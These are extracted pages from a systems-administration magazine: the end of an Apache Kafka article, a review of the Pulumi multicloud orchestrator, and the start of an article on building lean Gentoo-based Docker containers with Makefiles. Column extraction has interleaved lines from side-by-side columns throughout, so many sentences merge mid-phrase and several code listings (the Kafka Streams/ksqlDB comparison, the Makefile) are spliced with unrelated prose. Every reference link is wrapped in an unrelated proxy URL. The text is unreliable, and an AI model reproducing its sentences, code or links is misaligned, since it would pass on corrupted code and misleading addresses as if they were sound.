14 [...] sages, lookup tables, aggregations by
key, and more.
When programming, it is also im-
Listing 3: JSON for Kafka Connect portant to remember that operations
01 [...] such as aggregation and enrichment
02 { are typically stateful. The Kafka appli-
03 "connector.class": "io.confluent.connect.elasticsearch.ElasticsearchSinkConnector", cation must not lose this state, but at
04 "topics" : "my_topic", the same time it must remain highly
05 "connection.url" : "http://elasticsearch:9200", available: If the application fails, its
06 "type.name" : "_doc", state is also lost.
07 "key.ignore" : "true",
You could try to develop a schema to
08 "schema.ignore" : "true"
maintain this state somewhere, but
09 }
it is devilishly complicated to write
10 [...]
and debug on a large scale, and it

38 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Apache Kafka TO O L S

wouldn’t really help to improve the big challenge. The Streams API solves render views that show the status of
lives of Kafka users directly. There- both problems: On the one hand, a particular shipment.
fore, Apache Kafka offers an API for it maintains the status on the local The service reacts to events. In this
stream processing: Kafka Streams. hard disk and of internal topics in case, it first merges three data streams
the Kafka cluster; on the other hand, with each other and may perform
Kafka Streams the client application (i.e., the Kafka further state calculations (state
Streams cluster) automatically scales windows) according to the merges.
The Kafka Streams Java API allows as Kafka adds or removes new client Nevertheless, the service also serves
easy access to all computational prim- instances. HTTP requests at its REST endpoint.
itives of stateless and stateful stream In a typical microservice, the ap- Because Kafka Streams is a Java li-
processing (actions such as filtering, plication performs stream process- brary and not a set of dedicated infra-
grouping, aggregating, merging, etc.), ing in addition to other functions. structure components, it is trivial to
removing the need to write frame- For example, a mail order company integrate directly into other applica-
work code against the consumer API combines shipment events with tions and develop sophisticated, scal-
to do all these things. Kafka Streams events in a product information able, fault-tolerant stream processing.
also supports the potentially large change log, which contains cus- This feature is one of the key differ-
number of states that result from tomer records to create shipment ences from other stream-processing
the calculations of the data stream notification objects that other ser- frameworks like ksqlDB, Apache
processing. It also keeps the data col- vices then convert into email and Storm, or Apache Flink.
lections and enrichments either in text messages. However, the ship-
memory or in a local key-value store ment notification service might ksqlDB
(based on RocksDB). also be required to provide a REST
Combining stateful data processing API for synchronous key queries by Kafka Streams, as a Java-based
and high scalability turns out to be a mobile applications once the apps stream-processing API, is very well
TO O L S Apache Kafka

suited for creating scalable, stand- able to database-like applications. It (stream processing) with Kafka
alone stream-processing applications. aims to provide a conceptual model Streams or ksqlDB.
However, it is also suitable for enrich- for most Kafka-based stream-process- In this article, I explained the basic
ing the stream-processing functions ing application workloads. For com- concepts of Apache Kafka, but there
available in Java applications. parison, Listing 4 shows an example are other helpful components as well:
What if applications are not in Java of logic that continuously collects n The REST proxy [7] takes care of
or the developers are looking for a and counts the values of a message communication over HTTP(S) with
simpler solution? What if it seems attribute. The beginning of the listing Kafka (producer, consumer, admin-
advantageous from an architectural shows the Kafka Streams version; the istration).
or operational point of view to imple- second part shows the version written n The Schema Registry [4] regulates
ment a pure stream-processing job in ksqlDB. data governance; it manages and
without a web interface or API to versions schemas and enforces cer-
provide the results to the frontend? In Conclusions and Outlook tain data structures.
this case, ksqlDB enters the play. n Cloud services simplify the opera-
The highly specialized database Kafka has established itself on the tion of fully managed serverless in-
is optimized for applications that market as the de facto standard for frastructures, in particular, but also
process data streams. It runs on its event streaming; many companies of platform-as-a-service offerings.
own scalable, fault-tolerant cluster use it in production in various proj- Apache Kafka version 3.0 will remove
and provides a REST interface for ects. Meanwhile, Kafka continues to the dependency on ZooKeeper (for
applications that then submit new develop. easier operation and even better scal-
stream-processing jobs to execute and With all the advantages of Apache ability and performance), offer fully
retrieve results. Kafka, it is important not to ignore managed (serverless) Kafka Cloud ser-
The stream-processing jobs and the disadvantages: Event streaming vices, and allow hybrid deployments
queries are written in SQL. Thanks is a fundamentally new concept. De- (edge, data center, and multicloud).
to the interface options by REST and velopment, testing, and operation is Two videos from this year’s Kafka
the command line, it does not mat- therefore completely different from Summit [8] [9], an annual confer-
ter which programming language using known infrastructures. For ence of the Kafka community, also
the applications use. It is a good example, Apache Kafka uses rolling offer an outlook on the future and
idea to start in development mode, upgrades instead of active-passive a review of the history of Apache
either with Docker or a single node deployments. Kafka. The conference took place
running natively on a development That Kafka is a distributed system online for the first time in 2020 and
machine, or directly in a supported also has an effect on production op- counted more than 30,000 registered
service. erations. Kafka is more complex than developers. n
In summary, ksqlDB is a standalone, plain vanilla messaging systems, and
SQL-based, stream-processing engine the hardware requirements are also Info
that continuously processes event completely different. For example, [1] Apache Kafka: [https://kafka.apache.org]
streams and makes the results avail- Apache ZooKeeper requires stable [2] Domain-driven design: [https://www.
and low latencies. In confluent.io/blog/microservices-apache-
Listing 4: Kafka Streams vs ksqlDB return, the software kafka-domain-driven-design]
01 [...] processes large amounts [3] Kafka Connect: [https://docs.confluent.io/
02 // Kafka Streams (Java): of data (or small but current/connect/userguide.html]
03 builder critical business trans- [4] Confluent Schema Registry: [https://docs.
04 .stream("input‑stream", actions) in real time confluent.io/current/schema-registry/
05 Consumed.with(Serdes.String(), Serdes.String())) and is highly avail- index.html]
06 .groupBy((key, value) ‑> value) able. This process not [5] Kafka Streams: [https://kafka.apache.org/
07 .count() only involves sending documentation/streams/]
08 .toStream() from A to B, but also [6] ksqlDB: [https://ksqldb.io]
09 .to("counts", Produced.with(Serdes.String(), Serdes.Long()));
loosely coupled and [7] REST proxy: [https://github.com/
10
scalable data integra- confluentinc/kafka-rest]
11 // ksqlDB (SQL):
tion of source and target [8] Kafka trends: [https://www.youtube.com/
12
13 SELECT x, count(*) FROM stream GROUP BY x EMIT CHANGES; systems with Kafka watch?v=eRc4SWa6Ivo]
14 [...] Connect and continu- [9] Kafka future: [https://www.youtube.com/
ous event processing watch?v=PRHGymrzGxg]

40 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Pulumi

Pulumi multicloud orchestrator

Fluent
Pulumi promises a unified interface and surface for orchestrating various this, too. What Pulumi advertises as
a unique killer feature is that it has
clouds and Kubernetes. By Martin Loschwitz
not invented a new scripting language
but relies on proven programming
The idea of populating all clouds feature, because other multicloud languages. What exactly can admins
with the same templates has remained orchestrators like Terraform can do look forward to?
a pipe dream until now. Although
some services offer a compatibility
interface for templates from Amazon
Web Services (AWS), it being the in-
dustry leader, my experience suggests
you should not rely on it. Admins
are faced with the major dilemma of
theoretically having to learn how to
use the orchestration tools for vari-
ous clouds and maintain their own
templates (see “The Nebulous Cloud”
box). Tools like Terraform (Figure 1)
promise to avoid exactly that.
One relatively new player in the field
of these tools is Pulumi. It differs sig-
nificantly from other tools in that it
uses known programming languages
instead of its own declarative syntax.
So, how does it work, and what does
the admin get out of it?

Infrastructure as Code
Lead Image © Dmitriy Shpilko, 123RF.com

Pulumi’s central promise is infrastruc-


ture as code (IaC). Admins provide
their virtual infrastructures in the
form of code, and Pulumi makes
sure that the virtual resources run Figure 1: Terraform is considered the top dog when it comes to orchestration, but it comes
as desired on the target platform. In with its own scripting language. Pulumi, on the other hand, relies on scripting languages
itself, this is not a groundbreaking that many admins already know.

42 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Pulumi CO N TA I N E R S A N D V I RT UA L I Z AT I O N

The Nebulous Cloud well-known syntax of common pro-


gramming languages.
Admins and developers now use the “cloud” and describe the desired state of your setup
umbrella term to group an inhomogeneous in a template file. You then feed the file to the
mass of technical approaches and concepts orchestration service of the respective cloud, Program, Project, Stack
that were not originally part of the cloud which sets up the required resources on the
definition. Initially, a cloud was understood to fly. A single command is all it takes to com- If you are dealing with Pulumi for
be classic virtualization combined with an on- pletely wipe out a virtual environment, which the first time, it is best to first famil-
demand API that enabled self-service. is especially beneficial for people who have to iarize yourself with its programming
Today, the cloud industry is far more ad- create similar setups on a regular basis, such model. Here, three terms come to
vanced. According to a general definition, as developers. mind that need further clarification:
today’s cloud also includes the ability to man- The dependable thing about standards is that the program, the project, and the
age your own resources centrally and quickly. there are so many of them, and the subject of
stack. Each of these three elements
Logically, if one major IT trend is the cloud orchestration in the cloud is no exception. AWS
has a dedicated service named CloudForma-
has its own task within the Pulumi
and another major trend is aiming for an ever-
increasing level of automation, clearly the two tion for this task. Microsoft Azure and Google universe.
factors will eventually converge. Cloud services can also be orchestrated. If pri- What Pulumi means when it refers to
In the context of the cloud, convergence also vate clouds such as OpenStack come into play, a program is more or less all the files
makes a great deal of sense. If you need a you’ll find corresponding interfaces there, as that are written in a specific program-
virtual environment comprising a network, a well. Then there is Kubernetes: If you want to ming language and together form
load balancer, several application servers, a operate corresponding workloads in AWS, you a logical unit. For example, if you
database, public IP addresses, and the appro- first have to tinker with the AWS resources and write your own Python class for your
priate firewall rules, you can either configure then run the resulting Kubernetes with the ap-
Pulumi code, it would be part of the
all these services manually through the ap- propriate configuration. You certainly run into
program in the Pulumi language.
propriate APIs, or you can use orchestration no shortage of interfaces.
The project is a little larger. It contains
a program and the metadata needed
If you take a look at other solutions according to the standard procedures for Pulumi. The pulumi up step as-
(e.g., Terraform), you will see that for your choice of scripting language. sumes that working metadata for the
they use a declarative scripting lan- Pulumi does not force admins to use respective program is available, so that
guage. Usually, a markup language a special environment for develop- Pulumi knows what to do.
such as YAML or JSON lets you ment work. Instead, your standard Finally, the stack is a concrete incar-
define the resources in a single file, editor or standard development envi- nation of a project on a cloud plat-
which you then hand over to the or- ronment is used, with all the features form. The stack state is reached when
chestrator. The orchestrator evaluates that are otherwise available. you have successfully started the
the domain-specific language (DSL) Nevertheless, Pulumi is a declara- infrastructure defined by Pulumi on a
file and interprets it accordingly. The tive tool. Once you have written cloud platform and can use it.
disadvantage from the administra- your code, you call pulumi up at the
tor’s point of view is that you have to command line to start the described Working with Pulumi
learn and understand the declarative infrastructure in the desired environ-
scripting language to work with the ment. In practice, Pulumi tries to In theory, the idea behind Pulumi
program. balance the declarative approach of sounds great at first glance. Instead
Pulumi takes a different tack and in- classic tools like Terraform with the of learning a complex declarative
stead relies on the syntax of existing
scripting languages. For example, if you
are familiar with Python (Figure 2),
you can package the infrastructure in
a Python script. Pulumi provides the
appropriate classes for the different
cloud providers, which can be im-
ported in the usual way. If you don’t
work with Python, you have a choice
between TypeScript, JavaScript, Go
(Figure 3), or C#. Pulumi supports all
programming languages from the .NET
framework, including VB and F#. Most
developers will find a language in this
potpourri that suits their taste.
To begin, you load the individual Pu- Figure 2: A resource declaration for Pulumi can be written in Python to create a storage
lumi modules into your IaC document account in Azure.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 43
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Pulumi

script language,
you draw on the
skills you already
have from work-
ing with other
programming lan-
guages. Indeed,
this is one advan-
tage of Pulumi
compared with
other solutions
such as Terraform.
However, from the
administrator’s or
developer’s point
of view, this ad-
vantage should
not be rated too
highly. Even
though Pulumi
supports the use
of well-known
programming
and scripting lan-
guages, you will Figure 3: This example performs the same task as the Python example in Figure 2 but is written in Go.
still need to read a
mass of documentation. understand how Pulumi’s AWS mod- claim in their documentation seems
The ability to use well-known script- ules work, but also how to use the questionable.
ing languages only makes your job modules for the other clouds.
easier in the sense that you can work To avoid misunderstandings: The Pu- From Program to Project
with a familiar syntax. However, if lumi feature set is clearly oriented to
you have a Python program that is the standards of the market. Other so- What does working with Pulumi look
intended to start an instance in AWS, lutions such as Terraform do not fully like from the administrator’s point of
you still need to call the appropri- abstract the respective cloud platform view? First, you need to install Pulumi,
ate functions to do so. Pulumi does but have different modules for differ- but this is not complicated: For Linux
not abstract the cloud APIs from the ent environments. You have to use systems, the manufacturer offers a
program so radically at this point these when defining the resources, downloadable shell script [1] that you
that you could rely on uniform com- just as in Pulumi. The only differ- call locally. The only required binary,
mands for different cloud platforms. ence is that, in Pulumi, you can use pulumi, is then stored in your home
In concrete terms, this means that a syntax you already know from your directory. The script automatically ex-
if you want to start a new instance previous work. Whether this really tends the PATH variable to include the
in AWS, for example, you can do saves as much time as the developers location of the binary file.
so in Go, Java, or one of the other
supported scripting languages. How-
ever, you do have to deal with how
the present task can be solved with
the Pulumi modules for the vari-
ous clouds, and to do so, you need
to understand how the Python pu-
lumi_aws module, which provides
the corresponding functions, works.
Because pulumi_aws is specific to
Pulumi, you have to deal with its
syntax, which is all the more true
if different workloads are to be set
up in different environments with Figure 4: The Pulumi service is a central component in the Pulumi stack and acts as a
Pulumi. Not only do you need to graphical control center. © Pulumi

44 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Pulumi CO N TA I N E R S A N D V I RT UA L I Z AT I O N

Installing the program on other First Project supports AWS, Azure, and Google
systems is a similarly relaxed experi- Cloud Platform but offers a mas-
ence. Pulumi is by no means Linux- In a freshly created directory, run sive feature set. AWS, for example,
specific. On macOS, it is included the pulumi new <Project> command. is just a roof under which hundreds
in the Homebrew collection [2], After prompting you for the login cre- of services now reside. Pulumi can-
although the installation script for dentials for Pulumi’s App Service, a not address them all, but in a normal
Linux that I mentioned earlier will wizard launches to guide you through working day with AWS, admins are
also do the trick. For Windows, a the most important steps of the setup unlikely to worry about missing func-
separate installation wizard is avail- and prompt you for various param- tionality. The same applies to Micro-
able to help you install Pulumi on eters. You can decide whether this is soft’s Azure and Google’s Cloud.
your system. a project for AWS, what the creden- Private solutions are far much less
tials for the AWS account are, or in well supported. Pulumi has a re-
The Pulumi Service which AWS region the rollout will source provider (the name of the
take place. Now, with your preferred plugins that extend Pulumi with
At this point, Pulumi is almost ready scripting language, define the desired support for certain OpenStack fea-
for use – almost. Now you need to virtual environment such that it con- tures) for OpenStack. However, the
deal with a service that seems a bit tains all the necessary components. provider is far removed from sup-
strange at first glance: the Pulumi Once the project meets your require- porting all the features that modern
service app.pulumi.com, a centrally ments, the next step is deployment. The OpenStack installations offer and
operated directory for Pulumi stacks is limited to rather basic support.
of individual users (Figure 4). The pulumi up Pulumi cannot handle the more
manufacturer describes the Pulumi complex tasks, perhaps because
service as a kind of support for the command handles all the necessary most users simply use Pulumi with
administrator in managing their steps in the background. The App the large providers and do not want
rolled-out setups: From here, various Service shows that the Pulumi service to deal with additional problems
stack parameters can be changed or is far more powerful than it seems at that arise when using Pulumi with
examined. first glance, because it, not the Pu- private clouds. For example, if you
For the open source version of Pu- lumi binary on the developer’s host, are using a private cloud that can-
lumi, the manufacturer assumes handles the communication with the not be accessed over the Internet,
that the app is centrally operated respective cloud services in the back- you will inevitably need the Pulumi
by the provider and remains free ground. Detouring by way of the Pu- Enterprise version, so you can op-
for personal use by the user. If you lumi app does have some advantages: erate the Pulumi service locally. If
want to use the Pulumi service com- If a cloud vendor changes something you want to access the large public
mercially, license costs are incurred, in their APIs, end users do not neces- clouds, you will have no problems
which I will discuss in detail later. sarily have to update their binaries to with the program; however, it is not
In the Enterprise version, it is also use the new features. suitable for private clouds.
possible to run a separate instance of As soon as the deployment of a stack
the Pulumi service locally, which is a from within a project is finished, Pu- Support for Kubernetes
particularly useful alternative if you lumi shows it as active, and you can
do not want to pass on certain in- use it. If the developer made a mis- In addition to genuine infrastruc-
formation (e.g., details of your own take or forgot something, the stack ture-as-a-service offerings, Pulumi
stacks and where they are rolled out) can be pushed into a black hole with now also offers strong support for
to third parties. Kubernetes. Little wonder: Strictly
The remainder of this article assumes pulumi destroy speaking, Kubernetes is nothing
private use, for which Pulumi does more than a fleet orchestrator.
not charge. However, you do have in the project’s folder. All told, the However, the magic takes place
to create an account, because the Pulumi service proves to be a helpful one level higher than in the classic
first time pulumi new is called, the tool in everyday development work. clouds. Kubernetes assumes that it
command-line tool tries to connect to has access to executable systems on
the service and create a correspond- Supported Target Platforms which it can install its components
ing entry there. Single sign-on for and operate containers. A tool like
Pulumi’s hosted app service will work How Pulumi takes applications into Pulumi would be difficult to imag-
with a variety of providers; for ex- the cloud is explained in sufficient ine without support for Kubernetes;
ample, you can use a GitHub account. detail in this article, but what clouds therefore, the developers integrated
Once the Pulumi account has been can you manage with Pulumi? precisely this function into their
created, it’s time to get started with Clearly the big hyperscalers will be software. However, the Pulumi ser-
the actual project. part of the package: Pulumi not only vice must be able to communicate

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 45
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Pulumi

with the Kubernetes API for the de- extent of $1,000 or more per month. want to run an unimportant workload
ployment to work. If the Kubernetes If an administrator’s Pulumi project on AWS, but only on cheap instances,
instance can only be reached over runs amok and starts virtual machines it would be better to rule out Ama-
a local connection, a local Pulumi without anyone noticing, a rude zon’s high-end data center in Frank-
service is again needed, which re- awakening threatens at the end of the furt for the workload.
quires the Enterprise version of the month in the form of a massive bill. In addition to hard prohibitions,
product. Pulumi therefore has the option to Policy Packs also provide warnings.
map a set of rules that provides dif- If an admin uses certain services in
Policy as Code ferent permissions for different devel- a public cloud, Pulumi can display
opers – with the Enterprise version, a note for the individual case that
The Pulumi developers draw particu- only, for which you again need to put warns of financial or technical risks.
lar attention to one feature in terms of your money on the table; however, Practically, the policies also use well-
security, and the product has a kind it opens a multitude of possibilities. known programming languages, so
of unique selling point: Policy as code Admins then have the option to de- they are implemented like all other
is the main focus of the Pulumi Cross- fine Policy Packs (Figure 5), which programs in Pulumi. The downside
Guard product. contain a set of rules or several re- is that you have to choose the corre-
The narrative goes something like lated sets of rules that assign different sponding descriptions and keywords
this: Individual developers should authorizations to different users. for the individual scripting languages
not have to ask for resources or In Policy Packs, granular permissions from the documentation and practice
manual approval from the manager can be set at the API level of each with them before you can create and
for every Kubernetes cluster they cloud vendor down to the individual use Policy Packs in a meaningful way.
want to start, because that would API call, including the parameters for
lead to enormous administrative each. For example, if an administrator Differences from Terraform
overhead. However, administrators is only to be allowed to start instances
should not be able to do what they of a specific flavor on AWS, the Policy How does Pulumi perform compared
want on all cloud accounts of a Pack provides a switch for this. Policy with its direct competitor (and top
company. An Amazon AWS instance Packs also provide on-demand restric- dog) Terraform, and where do the
in the appropriate configuration tions for where admins can start spe- similarities and differences lie?
tends to burden your wallet to the cific workloads. For example, if you First, you have to learn a declarative
scripting language
in Terraform: the
HashiCorp con-
figuration language
(HCL), a domain-
specific language
(DSL). Second,
certain constructs
like loops, functions,
and classes are not
available. You will
also look in vain for
a counterpart to the
Pulumi service in
Terraform. Instead
of communicating
with a central ser-
vice, Terraform cre-
ates local state files,
which it leaves to
the administrator to
manage.
Pulumi offers
various automation
features that are
completely missing
Figure 5: You can create Policy rules for Pulumi in Python notation with the Pulumi Enterprise version only, in Terraform. If you
which is available for a charge. use the Prometheus

46 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Pulumi CO N TA I N E R S A N D V I RT UA L I Z AT I O N

monitoring, alarming, and trending list of the functions associated with open source software, it is only free
solution, for example, you can set up each level is provided by the manu- for personal use.
basic Pulumi integration right away. facturer on its website [3]. At the end of the day, Pulumi’s pric-
The tool integrates running stacks ing looks reasonable. Because the
into the solution on request. Conclusions single-user license costs nothing, the
solution can be put through its paces
Pulumi Commercial I like the idea behind Pulumi. Any- before you pay a single penny to the
one who has ever worked with Ter- manufacturer. If you are looking for
If you want to use Pulumi in a team, raform and rummaged through its a tool for multicloud orchestration,
you need a Pulumi Team License. The complex syntax may have wished Pulumi is definitely worth a look. n
Starter License is designed for three they already had the skills it re-
users, costs a moderate $50, and can quires. Pulumi offers this possibil-
be used to start 20 stacks. The Pro ity, even if not all of the learning Info
version for $75 provides access for overhead is eliminated. The author [1] Pulumi installation script: [https://www.
up to 25 members, teams, and roles; of a project still has to adjust to how pulumi.com/docs/get-started/install/]
unlimited stacks; and support during individual classes or functions are [2] Homebrew for macOS: [https://brew.sh]
business hours. called in Pulumi. [3] Pulumi Policy Packs: [https://www.pulumi.
If you choose the Enterprise package, What is less pleasing is the relatively com/docs/get-started/crossguard/]
the price is a matter of negotiation. hard-wired tie-in to the Pulumi ser-
The package then includes 24/7 sup- vice. Although the tool can theoreti- The Author
port, policies-as-code, and an unlim- cally be used without this service, Martin Gerhard Loschwitz is
ited number of members in teams. the practical benefits of the Pulumi Cloud Platform Architect at
As already mentioned, the Pulumi service are quite clear. In commercial Drei Austria and works on
service can be operated locally if you use, however, this also means that topics such as OpenStack,
don’t want it in the cloud. A detailed you will have to pay; although it is Kubernetes, and Ceph.
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Build Secure Containers

Building sustainably safe containers

Build by Number
The basic container images on which you base your work can often be out of date. We show you how to solve
this problem and create significantly leaner containers. By Konstantin Agouros
Among other things, my job involves available. At the same time, I wanted The third line ensures that the call java
developing applications in the field of the containers to be leaner. ‑jar mywebapp.jar is executed auto-
network automation on the basis of the matically if the container is started with
Spring Boot framework, which requires Dockerfiles docker run and without arguments. The
a running Java environment. At the last line finally exposes port 8080, so
same time, some infrastructure applica- Docker supports the ability to import that you can leave out the ‑p 8080:8080
tions are required, such as DNS servers. the compressed tarball of a change option in the Docker call.
Before containers existed, infrastruc- root environment, but the build pro- The Docker build process is organized
ture services ran in minimal change cess is hard to maintain. It makes hierarchically. The images provided
root environments, containing only the more sense to use a Dockerfile that by the binaries in the container build
necessary binaries (e.g., chroot/named), contains the components of the image on each other. Starting with a base
configuration files, and libraries. This and also lets you import single files image, which is initially created as
setup reduced the number of potential from other images. Calling scripts or an empty image with FROM scratch,
attack vectors for exposed services. For entire installations might be possible, several images can each completely
example, an attempt by the attacker to as well. To create such a container, import another one, which creates
call /bin/sh would fail because the en- you would use docker build. To be- the layers that are downloaded one
vironment would not have a shell. gin, though, copy an archive (usually by one from the registry. If a layer
Classical Docker build files, which a .tar.gz) into a folder and create a remains unchanged, no download is
use FROM ubuntu to include a complete file named Dockerfile: required, saving time and bandwidth.
Ubuntu environment, are the exact op- The referenced image, gentoo‑java,
posite of the approach just described. FROM dockerrepo.matrix.dev/U
The resulting container is easier to gentoo‑java:latest‑amd64 Why Gentoo?
debug because, for example, a shell is ADD webapp.tar.gz / The system presented here would also work
available. However, it is also far larger ENTRYPOINT ["java", "‑jar", U with other distributions. I chose Gentoo be-
and less secure because an attacker "mywebapp.jar"] cause the distribution compiles applications
could find and use the shell binary. EXPOSE 8080/tcp locally from source files. Therefore, you can
Manufacturers keep their official con- easily archive and document the sources of
tainers up to date, which means that The first line describes a base image the binaries for a later audit of each version
Lead Image © itstudiom1, 123RF.com

when the container is rebuilt, an up- whose filesystem is inserted into the of each container. Because admins compile
dated Ubuntu would also be dragged current container. In this case, it’s a the documentation themselves and the
in. However, no mechanism automati- Gentoo Linux-based image (see the compiler sources are also available, the chain
cally triggers such a rebuild. One of “Why Gentoo?” box) that provides a of documentation can be traced back to the
my goals was therefore to rebuild au- runnable Java environment. The next source code. Only an infection of the build
host would offer an attack vector, and the risk
tomatically all containers that contain line adds the contents of webapp.tar.gz
can be mitigated by appropriate protection.
components for which patches are to the root directory of the container.

48 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Build Secure Containers CO N TA I N E R S A N D V I RT UA L I Z AT I O N

includes the GNU C library (glibc) liver shared libraries, the section of the push. The two files are only created if
image and (because the Java binaries Makefile for the libuv package is: the step was successful, and pushtime
require it) the zlib library and some serves as the target in the Makefile.
GNU compiler collection (GCC) li- gentoo‑libuv/gentoo‑libuv.tar.gz: U To map the hierarchy of the contain-
braries. However, only the necessary /usr/lib64/libuv.so.1 ers in the Makefile, the pushtime files
shared libraries are included, not the q files dev‑libs/libuv | U of all images are also included in the
complete images. Finally, the glibc grep /usr/lib | tar ‑c ‑T ‑ ‑v ‑z ‑f $@ dependencies that are necessary to
image uses a base image in its FROM build the container. The Makefile sec-
line, which contains a minimal file- Some packages need more files, so suit- tion in Listing 2 illustrates this.
system with the /etc, /dev, and /tmp able grep filters more or less sort out The Java image is based on the glibc
directories. Thanks to its hierarchical or sort in. The example also shows the image, but also copies files from zlib
structure, the build system, described dependency. The archive is only rebuilt and GCC, which means you have to
later, can update individual layers of if the /usr/lib64/libuv.so.1 file has build and upload these images be-
the image separately. changed. The manual work for each fore the Java image can be created.
The source files for the images are package now consists of identifying a Listing 3 (abridged) shows the call
available as tar.gz archives, which are file that can be used as an indicator for to Make and its screen output after
created from cleaned up file lists of a patch and sorting out which files in patches for glibc were released, trig-
packages. In the container, for example, the archive are necessary at the end. gering a rebuild of all containers.
neither man pages nor sample configu- My environment has two Makefiles: The trickiest task in this approach is
rations are needed. Building up with one to create the tar.gz archives and that of resolving all the dependencies.
one image per package might sound one that then triggers the Docker Minimizing the container means find-
complex, but it only requires more build processes. Listing 1 shows the ing all the necessary shared libraries,
work in the first step. The application Makefile for the archives. and the tool of choice is ldd, which
images at the end of the chain can be For GCC and Java, a small shell script lists the referenced shared libraries of
exported as a single file and integrated handles the task of compiling the a binary.
into other registries if required. packages, because softlinks still play a Instead of running the binary right
role that would otherwise be missing. in the container in the environment
Practical Implementation The base container is not included in you created, it makes sense to launch
the Makefile, because it is not gener- it in a change root environment,
The first step in creating a container ated statically, but from packages. which makes it easier to find out
image from a package is to collect the After an upgrade, you now just need which library is missing. Also, a run
files from the operating environment. to call Make to recreate the archives with strace, which identifies missing
To help me keep track, I first defined where necessary, and the containers are configuration files, for example, is
a folder structure. Each container has then built. Immedi-
a folder with a name that follows the ately after building Listing 1: Makefile for Archives
<distribution>‑<package name> pat- they are uploaded all: gentoo‑glibc/gentoo‑glibc.tar.gz gentoo‑gcc/gentoo‑gcc.tar.gz
tern, resulting in folders in the form to the local registry gentoo‑java/gentoo‑java.tar.gz gentoo‑gmp/gentoo‑gmp.tar.gz gentoo‑mpc/
gentoo‑glibc or gentoo‑gcc. Each of with the latest tag. gentoo‑mpc.tar.gz gentoo‑mpfr/gentoo‑mpfr.tar.gz
these folders contains the respective The sticking point
Docker file and the tar.gz archive here was the gentoo‑glibc/gentoo‑glibc.tar.gz: /usr/include/libintl.h
that was picked up. modification date. sh createglibctar.sh
GNU Make is used as the build tool be- Although it is pos-
gentoo‑gcc/gentoo‑gcc.tar.gz: /usr/bin/gcc
cause it makes it relatively easy to map sible to query the
sh creategcctar.sh
dependencies to files by timestamps. If modification data
a package was updated since the last of existing contain-
gentoo‑java/gentoo‑java.tar.gz: /usr/lib/jvm/icedtea‑bin‑8 createjavatar.sh
creation date of the tar.gz archive, the ers in the registry sh createjavatar.sh
timestamp of the files is newer and or on the local host gentoo‑gmp/gentoo‑gmp.tar.gz: /usr/lib64/pkgconfig/gmp.pc
Make triggers an action. with an API call, it q files dev‑libs/gmp |grep usr/lib|tar czvf $@ ‑T ‑
A list of files is necessary to create the is difficult to do in
archive. The easiest way for an admin the Makefile, which gentoo‑mpc/gentoo‑mpc.tar.gz: /usr/lib64/libmpc.so
on Gentoo to create this list is to run was what prompted q files dev‑libs/mpc |grep lib|grep ‑v doc|tar czvf $@ ‑T ‑
the q files <package> command. To me to cheat and
discard unnecessary files, then, use simply add && touch gentoo‑mpfr/gentoo‑mpfr.tar.gz: /usr/lib64/libmpfr.so
q files dev‑libs/mpfr |grep lib|grep ‑v doc|tar czvf $@ ‑T ‑
grep filters and pass the resulting list builddate to the
into a tar command that reads the list docker build call
gentoo‑zlib/gentoo‑zlib.tar.gz: /usr/lib64/pkgconfig/zlib.pc
of files to archive from standard input. and then && touch
q files sys‑libs/zlib | grep /lib64 | tar cvzf $@ ‑T ‑
For most of the packages that only de- pushtime after docker

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 49
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Build Secure Containers

easier to handle in this way. If several and if version 5.4 is available after would normally be possible to find
binaries are used, the program might the updates, then the indicator file is the error by starting a shell in the
launch, but it could throw an error missing and the Makefile fails. This container; however, this lean ap-
were a certain function called. possibility must be taken into account proach does not have a shell option.
Developers also need to keep in when selecting the indicator files. Instead, a debug container can be
mind that shared libraries occasion- built very easily. In the first step you
ally change versions of dependen- Debugging Containers? need to create a container for the
cies. If the file used to determine BusyBox package and then the debug
whether the archive needs to be If the container does not work even container with the Docker file:
rebuilt is /usr/lib64/libdb‑5.3.so, though all libraries are present, it
FROM dockerrepo/applicationcontainer:U
Listing 2: Managing Dependencies latest‑amd64
gentoo‑java/pushtime: gentoo‑java/gentoo‑java.tar.gz gentoo‑glibc/pushtime gentoo‑zlib/pushtime COPY ‑‑from=dockerrepo/gentoo‑busybox:U
gentoo‑gcc/pushtime latest‑amd64 /bin/ /bin/
cd gentoo‑java; docker build ‑t dockerrepo.matrix.dev:gentoo‑java:latest‑amd64 . && touch buildtime
&& docker push dockerrepo.matrix.dev/gentoo‑java:latest‑amd64 && touch pushtime
In the busybox container a softlink
needs to point from /bin/busybox
Listing 3: Make After glibc Update (Abridged) to /bin/sh, which gives developers
a version of the container with an
# make ‑f Makefile.docker
cd gentoo‑glibc; docker build ‑t dockerrepo.matrix.dev/gentoo‑glibc:latest‑amd64 . && touch buildtime && interactive shell. However, this is
docker push dockerrepo.matrix.dev/gentoo‑glibc:latest‑amd64 && touch pushtime a separate debug container, which
Sending build context to Docker daemon 21.12MB means it is less likely to end up in
Step 1/2 : FROM dockerrepo.matrix.dev/gentoo‑base:latest production by mistake.
‑‑‑> 22fe37b24ebe
Step 2/2 : ADD gentoo‑glibc.tar.gz /
